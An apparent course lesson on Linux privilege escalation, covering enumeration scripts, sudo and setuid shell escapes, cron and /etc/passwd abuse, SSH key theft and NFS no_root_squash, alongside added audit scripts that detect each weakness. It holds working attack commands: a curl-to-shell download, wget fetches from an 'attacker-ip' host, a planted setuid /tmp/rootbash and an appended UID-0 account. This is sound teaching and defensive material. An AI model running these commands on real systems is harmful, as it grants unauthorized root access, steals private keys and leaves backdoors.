# Linux Privilege Escalation
After gaining initial access, escalating to root is essential for full system control. This lesson covers the most common Linux privilege escalation techniques.
## Enumeration Scripts

### LinPEAS (Recommended)

```bash
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or transfer and run
wget http://attacker-ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

### LinEnum

```bash
wget http://attacker-ip/linenum.sh
chmod +x linenum.sh
./linenum.sh -t
```

### Linux Exploit Suggester

```bash
wget http://attacker-ip/les.sh
chmod +x les.sh
./les.sh
```
## Manual Enumeration

### System Information

```bash
# OS and kernel
uname -a
cat /etc/issue
cat /etc/*-release
cat /proc/version

# Current user
id
whoami

# All users
cat /etc/passwd
cat /etc/group

# Sudo privileges
sudo -l
```
### SUID/SGID Binaries

```bash
# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries
find / -perm -g=s -type f 2>/dev/null

# Both. The parentheses are required: -o binds more loosely than the implicit
# AND, so without them "-type f" would only apply to the SGID half.
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
```
### Writable Files

```bash
# World-writable files
find / -writable -type f 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null

# Writable /etc files
find /etc -writable -type f 2>/dev/null
```
## Privilege Escalation Techniques

### 1. Sudo Misconfiguration

Check sudo rights:

```bash
sudo -l
```

Common exploitable entries:

```bash
# If you can run vim as root
sudo vim -c ':!/bin/bash'

# If you can run less as root
sudo less /etc/passwd
# ...then, at the less prompt, type:
!/bin/bash

# If you can run find as root
sudo find . -exec /bin/bash \; -quit

# If you can run python as root
sudo python -c 'import os; os.system("/bin/bash")'

# If you can run nmap as root (old versions only; interactive mode was removed)
sudo nmap --interactive
# ...then, at the nmap> prompt, type:
!sh
```

Check GTFOBins for more: [gtfobins.github.io](https://gtfobins.github.io)
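The defender's counterpart to `sudo -l` is auditing sudoers rules for exactly the programs listed above. The script below is an added example, not part of the original lesson or of GTFOBins: it reads rules in `/etc/sudoers` syntax from stdin (the same grammar `sudo -l` summarises) and prints one finding per rule that grants `ALL` or one of the shell-capable binaries. The sample rules, the `SHELL_ESCAPE_BINS` list and the function names are constructed for this example.

```sh
#!/bin/sh
# Added example: audit sudoers-style rules for commands that escape to a root shell.

# Programs the lesson shows giving an interactive root shell under sudo (extend as needed).
SHELL_ESCAPE_BINS="vim vi less more find python python2 python3 nmap bash sh"

# Constructed sample in /etc/sudoers syntax; not taken from a real host.
SAMPLE_SUDOERS='# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
backup  ALL=(root) NOPASSWD: /usr/bin/find, /usr/bin/less
www     ALL=(root) NOPASSWD: /usr/bin/vim
ops     ALL=(ALL) NOPASSWD: ALL'

# audit_sudoers: parse rules of the form "user HOST=(runas) [TAG:] cmd, cmd ..."
# from stdin. Output lines start with CRITICAL (unrestricted ALL) or HIGH (shell escape).
audit_sudoers() {
  while IFS= read -r line; do
    case "$line" in ''|'#'*|Defaults*) continue ;; esac
    user=${line%%[[:space:]]*}
    if [ "$user" = root ]; then continue; fi          # root having sudo is not a finding
    cmds=${line#*=}                                   # drop "user HOST="
    case "$cmds" in \(*\)*) cmds=${cmds#*\)} ;; esac  # drop "(runas)"
    cmds=$(printf '%s' "$cmds" | sed -E 's/[A-Z]+://g')   # drop NOPASSWD:, SETENV:, ...
    printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r c; do
      c=$(printf '%s' "$c" | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//')
      if [ -z "$c" ]; then continue; fi
      if [ "$c" = ALL ]; then
        printf 'CRITICAL %s may run ALL commands as root\n' "$user"
        continue
      fi
      bin=${c%% *}; bin=${bin##*/}                    # basename of the command's first word
      for b in $SHELL_ESCAPE_BINS; do
        if [ "$bin" = "$b" ]; then
          printf 'HIGH %s: "%s" can spawn a root shell (see GTFOBins)\n' "$user" "$c"
        fi
      done
    done
  done
}

# Run the audit over the constructed sample.
demo_sudoers_audit() {
  printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
}

demo_sudoers_audit
```

On a live host the same function is fed with `cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers` (run as root, since those files are mode 0440). The `%admin ALL` rule is reported as CRITICAL on purpose: full sudo for a group is normal, but the finding is the prompt to review who is in that group.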
### 2. SUID Exploitation

Identify vulnerable SUID binaries:

```bash
find / -perm -u=s -type f 2>/dev/null
```

Common exploitable SUID binaries:

```bash
# /usr/bin/find
find . -exec /bin/sh -p \; -quit

# /usr/bin/vim
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# /usr/bin/bash
bash -p

# /usr/bin/python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# /usr/bin/nmap (interactive mode)
nmap --interactive
# ...then, at the nmap> prompt, type:
!sh
```
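A setuid inventory is only useful to a defender when compared against a known-good baseline; the one-off `find` above tells you what is setuid today, not what changed. The following script is an added example, not part of the original lesson: it diffs a recorded baseline against the current list (both produced by the `find` command from the enumeration section), reports every new setuid file, and raises the severity when the new file is one of the shell-capable binaries above or sits in a user-writable location such as `/tmp` (where the cron technique later in this lesson drops `rootbash`). The file lists and the `SHELL_CAPABLE` and `SUSPECT_DIRS` names are constructed for the example.

```sh
#!/bin/sh
# Added example: compare the current SUID/SGID inventory with a recorded baseline.

# Programs that hand out a shell when setuid (from the lesson / GTFOBins).
SHELL_CAPABLE="find vim vi bash sh python python2 python3 nmap"
# Directories where a setuid file is almost never legitimate.
SUSPECT_DIRS="/tmp /var/tmp /dev/shm /home"

# audit_suid_baseline BASELINE CURRENT
# Both files hold one path per line, e.g. from
#   find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
audit_suid_baseline() {
  b=$(mktemp); c=$(mktemp)
  sort -u "$1" >"$b"
  sort -u "$2" >"$c"
  # comm -13 prints lines only in CURRENT: setuid files added since the baseline
  comm -13 "$b" "$c" | while IFS= read -r f; do
    printf 'NEW %s\n' "$f"
    name=${f##*/}
    for s in $SHELL_CAPABLE; do
      if [ "$name" = "$s" ]; then
        printf 'HIGH %s gives a root shell when setuid\n' "$f"
      fi
    done
    for d in $SUSPECT_DIRS; do
      case "$f" in
        "$d"/*) printf 'HIGH %s: setuid file in a user-writable location\n' "$f" ;;
      esac
    done
  done
  rm -f "$b" "$c"
}

# Demo with constructed lists: a baseline of three standard binaries and a
# current inventory that has gained /usr/bin/find and a copied /tmp/rootbash.
demo_suid_audit() {
  d=$(mktemp -d)
  printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/su >"$d/baseline"
  printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/su \
                /usr/bin/find /tmp/rootbash >"$d/current"
  audit_suid_baseline "$d/baseline" "$d/current"
  rm -rf "$d"
}

demo_suid_audit
```

Record the baseline right after provisioning (`find ... | sort > /var/lib/suid.baseline`) and run the comparison from a cron job or your configuration-management agent; the `NEW` lines alone are usually enough to spot a planted setuid copy of `bash`.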
### 3. Capabilities

```bash
# Find files with capabilities
getcap -r / 2>/dev/null
```

Exploit cap_setuid:

```bash
# If python has cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
### 4. Cron Jobs

```bash
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
cat /var/spool/cron/crontabs/*

# Check for writable scripts
ls -la /path/to/cron/script

# Check PATH in crontab
# If PATH includes writable directory, create malicious script
```

Exploit writable cron script:

```bash
# If /opt/script.sh is writable and runs as root
echo '#!/bin/bash' > /opt/script.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /opt/script.sh

# Wait for cron, then:
/tmp/rootbash -p
```
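Both cron weaknesses above (a world-writable script run by root, and a writable directory on the crontab's `PATH`) can be checked mechanically. The script below is an added example, not part of the original lesson: it parses text in `/etc/crontab` format (minute hour dom mon dow user command, plus `VAR=value` lines) from stdin, tests every absolute script path and every `PATH` entry for the other-write bit, and notes commands that are resolved through `PATH` at all. The sample crontab and scripts are constructed in a temporary directory; `world_writable`, `audit_crontab` and `demo_cron_audit` are names chosen for this example.

```sh
#!/bin/sh
# Added example: audit a system crontab for world-writable root scripts and PATH dirs.

# world_writable PATH: true if the "other" write bit (o+w, octal 002) is set.
# Uses find's permission test rather than [ -w ] so the result does not depend
# on which user runs the audit.
world_writable() {
  [ -n "$(find "$1" -prune -perm -002 2>/dev/null)" ]
}

# audit_crontab: read /etc/crontab-format text on stdin, print findings.
audit_crontab() {
  while IFS= read -r line; do
    case "$line" in
      ''|'#'*) continue ;;
      PATH=*)
        old_ifs=$IFS; IFS=:
        for dir in ${line#PATH=}; do
          IFS=$old_ifs
          if world_writable "$dir"; then
            printf 'HIGH world-writable directory on cron PATH: %s\n' "$dir"
          fi
          IFS=:
        done
        IFS=$old_ifs
        continue ;;
      [A-Za-z_]*=*) continue ;;          # SHELL=, MAILTO=, ...
    esac
    set -f; set -- $line; set +f         # split fields without glob-expanding "*"
    case "$1" in
      @*) if [ $# -lt 3 ]; then continue; fi; user=$2; shift 2 ;;   # @reboot user cmd
      *)  if [ $# -lt 7 ]; then continue; fi; user=$6; shift 6 ;;   # m h dom mon dow user cmd
    esac
    cmd=$1
    case "$cmd" in
      /*) if world_writable "$cmd"; then
            printf 'HIGH world-writable cron script run as %s: %s\n' "$user" "$cmd"
          fi ;;
      *)  printf 'MEDIUM "%s" (user %s) is resolved through PATH and is hijackable if a PATH dir is writable\n' "$cmd" "$user" ;;
    esac
  done
}

# Demo: constructed crontab with one safe script, one world-writable script and
# one world-writable directory appended to PATH.
demo_cron_audit() {
  d=$(mktemp -d)
  mkdir -p "$d/opt" "$d/writable-bin"
  printf '#!/bin/sh\necho backup\n' >"$d/opt/backup.sh";  chmod 755 "$d/opt/backup.sh"
  printf '#!/bin/sh\necho cleanup\n' >"$d/opt/script.sh"; chmod 666 "$d/opt/script.sh"
  chmod 777 "$d/writable-bin"
  cat >"$d/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin:$d/writable-bin
17 * * * *   root run-parts /etc/cron.hourly
*/5 * * * *  root $d/opt/script.sh
0 2 * * *    root $d/opt/backup.sh --all
EOF
  audit_crontab <"$d/crontab"
  rm -rf "$d"
}

demo_cron_audit
```

For the files in `/etc/cron.d/` the same format applies, so `cat /etc/crontab /etc/cron.d/* | audit_crontab` covers them; per-user crontabs in `/var/spool/cron/crontabs` lack the user field and would need `shift 5` instead.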
### 5. Kernel Exploits

```bash
# Check kernel version
uname -r

# Search for exploits
searchsploit "Linux Kernel $(uname -r)"
```

Notable kernel exploits:

| Exploit | Affected Versions |
|---|---|
| DirtyCow (CVE-2016-5195) | Linux < 4.8.3 |
| DirtyPipe (CVE-2022-0847) | Linux 5.8 - 5.16.11 |
| PwnKit (CVE-2021-4034) | Most Linux systems |
### 6. Writable /etc/passwd

```bash
# If /etc/passwd is writable, add a root user
openssl passwd -1 password123
# Output: $1$xyz$hashedpassword

# Add to /etc/passwd
echo 'root2:$1$xyz$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd

# Switch to new root user
su root2
# Password: password123
```
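The result of this technique is easy to detect because it leaves two anomalies in `/etc/passwd`: a second account with UID 0, and a password hash stored in a world-readable file instead of `/etc/shadow`. The script below is an added example, not part of the original lesson: `audit_passwd` reads passwd-format lines from stdin and reports both anomalies (plus empty password fields), and `passwd_world_writable` checks the precondition the technique needs. The sample passwd content is constructed and includes the `root2` line from the example above.

```sh
#!/bin/sh
# Added example: detect the traces of an appended root account in /etc/passwd.

# Constructed sample; the root2 line is the one the lesson appends.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
root2:$1$xyz$hashedpassword:0:0:root:/root:/bin/bash'

# audit_passwd: read passwd-format lines on stdin, print one finding per issue.
audit_passwd() {
  while IFS=: read -r name pw uid gid gecos home shell; do
    case "$name" in ''|'#'*) continue ;; esac
    if [ "$uid" = 0 ] && [ "$name" != root ]; then
      printf 'CRITICAL %s has UID 0 (second root account)\n' "$name"
    fi
    case "$pw" in
      x|'*'|'!'|'!!'|'!*') ;;     # hash lives in /etc/shadow, or the account is locked
      '')  printf 'CRITICAL %s has an empty password field (login without a password)\n' "$name" ;;
      *)   printf 'HIGH %s has a password hash in /etc/passwd, readable by every user\n' "$name" ;;
    esac
  done
}

# passwd_world_writable FILE: true if the file carries the o+w bit (octal 002),
# which is the precondition for the technique above.
passwd_world_writable() {
  [ -n "$(find "$1" -prune -perm -002 2>/dev/null)" ]
}

# Demo over the constructed sample.
demo_passwd_audit() {
  printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
}

demo_passwd_audit
# On a live host:  audit_passwd </etc/passwd;  passwd_world_writable /etc/passwd && echo "passwd is world-writable"
```

A stricter variant compares `/etc/passwd` against a stored copy or package checksum (`dpkg -V base-files`, `rpm -V setup`), which also catches changed shells or home directories on existing accounts.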
### 7. SSH Keys

```bash
# Check for readable SSH keys
cat /home/*/.ssh/id_rsa
cat /root/.ssh/id_rsa

# Check for writable authorized_keys
ls -la /root/.ssh/
# If writable, add your public key
```
### 8. NFS Misconfiguration

```bash
# Check /etc/exports
cat /etc/exports
# Look for: no_root_squash

# On attacker machine:
showmount -e target-ip
mount -t nfs target-ip:/share /mnt

# Create SUID shell
cp /bin/bash /mnt/rootbash
chmod +s /mnt/rootbash

# On target:
/share/rootbash -p
```
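On the server side this comes down to one setting in `/etc/exports`, so it is worth checking mechanically rather than by eye. The script below is an added example, not part of the original lesson: `audit_exports` parses exports syntax (`path client(options) client(options) ...`) from stdin and flags `no_root_squash` as CRITICAL and exports open to any host (`*` or no client list) as HIGH. The sample exports file is constructed; `audit_exports` and `demo_exports_audit` are names chosen for this example.

```sh
#!/bin/sh
# Added example: audit /etc/exports for no_root_squash and unrestricted clients.

# Constructed sample /etc/exports; not from a real server.
SAMPLE_EXPORTS='# /etc/exports (constructed sample)
/srv/share    *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup   10.0.0.0/24(rw,sync,root_squash)
/srv/public   *(ro,all_squash)
/srv/legacy   192.168.1.50'

# audit_exports: read exports syntax on stdin, one finding per line of output.
audit_exports() {
  while IFS= read -r line; do
    case "$line" in ''|'#'*) continue ;; esac
    set -f; set -- $line; set +f        # split fields without expanding the "*" wildcard
    path=$1; shift
    if [ $# -eq 0 ]; then
      printf 'HIGH %s has no client list (exported to every host)\n' "$path"
      continue
    fi
    for client in "$@"; do
      host=${client%%\(*}               # "10.0.0.0/24(rw)" -> "10.0.0.0/24"
      opts=
      case "$client" in
        *\(*\)) opts=${client#*\(}; opts=${opts%\)} ;;
      esac
      # no_root_squash keeps a remote UID 0 as root on the server, so a client
      # can create root-owned setuid files on the share (the lesson's technique).
      case ",$opts," in
        *,no_root_squash,*) printf 'CRITICAL %s -> %s: no_root_squash (remote root is not mapped to nobody)\n' "$path" "$host" ;;
      esac
      case "$host" in
        ''|'*') printf 'HIGH %s is exported to any host\n' "$path" ;;
      esac
      # Without an explicit option the default is root_squash, so only the explicit setting is flagged.
    done
  done
}

# Demo over the constructed sample.
demo_exports_audit() {
  printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports
}

demo_exports_audit
# On a live server:  audit_exports </etc/exports
```

The fix for a CRITICAL line is to drop `no_root_squash` (or replace it with `all_squash` for data shares) and to restrict the client field to the hosts or subnet that actually mount the export.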
## PrivEsc Methodology

1. Run enumeration script (LinPEAS)
2. Check `sudo -l`
3. Find SUID/SGID binaries
4. Check cron jobs
5. Look for credentials in files
6. Check kernel version for exploits
7. Examine capabilities
8. Check writable files/directories
9. Look for NFS misconfigurations
10. Check for Docker/LXC breakout
## Quick Reference

```bash
# Basic enumeration
id; whoami; hostname
uname -a
cat /etc/passwd

# Sudo
sudo -l

# SUID
find / -perm -u=s -type f 2>/dev/null

# Cron
cat /etc/crontab
ls -la /etc/cron.*

# Capabilities
getcap -r / 2>/dev/null

# Writable
find / -writable -type f 2>/dev/null
```
Next, we'll cover Windows privilege escalation techniques.